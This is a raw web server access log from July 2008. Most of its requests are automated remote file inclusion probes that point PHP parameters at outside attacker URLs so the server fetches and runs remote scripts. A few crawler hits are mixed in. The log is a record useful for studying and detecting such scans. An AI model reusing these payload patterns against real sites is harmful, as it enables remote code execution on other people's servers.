212.34.153.42 - - [14/Jul/2008:10:30:40 -0700] "GET /index2.php?x=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
212.34.153.42 - - [14/Jul/2008:10:30:40 -0700] "GET /logs/index2.php?x=http://www.domsete.com.br/dom730/images/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:31:25 -0700] "GET /logs/access.log/download.php?sub=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:31:26 -0700] "GET /logs/download.php?sub=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:31:40 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:31:41 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:31:41 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:10:31:46 -0700] "GET /logs/access_071225.log//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:32:42 -0700] "GET /logs/access_080507.log//calendar.php?s=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:32:42 -0700] "GET /logs/access_080507.log//calendar.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.22.106 - - [14/Jul/2008:10:32:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.181 - - [14/Jul/2008:10:32:48 -0700] "GET /logs/access_080329.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:33:06 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:33:07 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:33:07 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:33:26 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:33:42 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:33:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:33:43 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:33:54 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:33:55 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:33:55 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:33:59 -0700] "GET /logs/access_080228.log/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:33:59 -0700] "GET /logs/access_080228.log/index.php5?lang=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:34:00 -0700] "GET /logs/index.php5?lang=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:34:00 -0700] "GET /logs/index.php5?lang=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:34:00 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [14/Jul/2008:10:34:18 -0700] "GET /logs/access_071225.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [14/Jul/2008:10:34:18 -0700] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.43.214 - - [14/Jul/2008:10:34:19 -0700] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:34:29 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:34:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:34:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:34:58 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:34:58 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:34:59 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:02 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:02 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:05 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.1.115 - - [14/Jul/2008:10:35:06 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [14/Jul/2008:10:35:06 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:35:07 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:09 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.43.214 - - [14/Jul/2008:10:35:11 -0700] "GET /logs/access_080225.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.montana.uchile.cl/downloads/plan.pps? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:12 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:12 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:35:13 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:35:28 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:35:29 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:35:29 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:10:35:39 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:10:35:40 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.119.120.253 - - [14/Jul/2008:10:35:40 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:36:27 -0700] "GET /index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18415 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:10:36:28 -0700] "GET /index.php?pageurl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18373 "-" "libwww-perl/5.69" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:36:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:10:36:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:10:36:43 -0700] "GET /logs//errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:10:36:43 -0700] "GET //errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:45 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:45 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:45 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:50 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:36:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:10:37:03 -0700] "GET /logs//errors.php?error=http://dosocder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [14/Jul/2008:10:37:04 -0700] "GET //errors.php?error=http://dosocder.t35.com/ya.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:10:37:15 -0700] "GET /logs/config.php?path_to_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [14/Jul/2008:10:37:19 -0700] "GET /config.php?path_to_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:37:24 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:37:55 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:37:55 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:37:55 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:38:39 -0700] "GET /logs/access_080401.log/download.php?sub=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:10:38:46 -0700] "GET /logs/access_080103.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.28 - - [14/Jul/2008:10:39:03 -0700] "GET /presto/?S=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.127.47.130 - - [14/Jul/2008:10:39:04 -0700] "GET /logs/access_080117.log/index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:10:39:04 -0700] "GET /logs/index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:39:11 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:39:12 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:39:12 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:39:23 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:39:23 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:39:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:39:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:39:58 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:10:40:08 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.112.41 - - [14/Jul/2008:10:40:09 -0700] "GET /logs/access_071225.log//theme.php?THEME_DIR=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.41 - - [14/Jul/2008:10:40:09 -0700] "GET //theme.php?THEME_DIR=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:10:40:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.112.41 - - [14/Jul/2008:10:40:09 -0700] "GET /logs//theme.php?THEME_DIR=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:40:15 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:40:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:40:16 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.41 - - [14/Jul/2008:10:40:34 -0700] "GET /logs/access_071218.log//theme.php?THEME_DIR=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:40:37 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:40:38 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:40:38 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:40:50 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:40:53 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:41:15 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:41:19 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:41:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [14/Jul/2008:10:41:49 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [14/Jul/2008:10:41:50 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.88.114.169 - - [14/Jul/2008:10:41:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.88.114.169 - - [14/Jul/2008:10:41:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:42:03 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:42:03 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:42:21 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:42:35 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:42:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:10:42:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:42:55 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:43:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Jul/2008:10:43:15 -0700] "GET /logs//errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
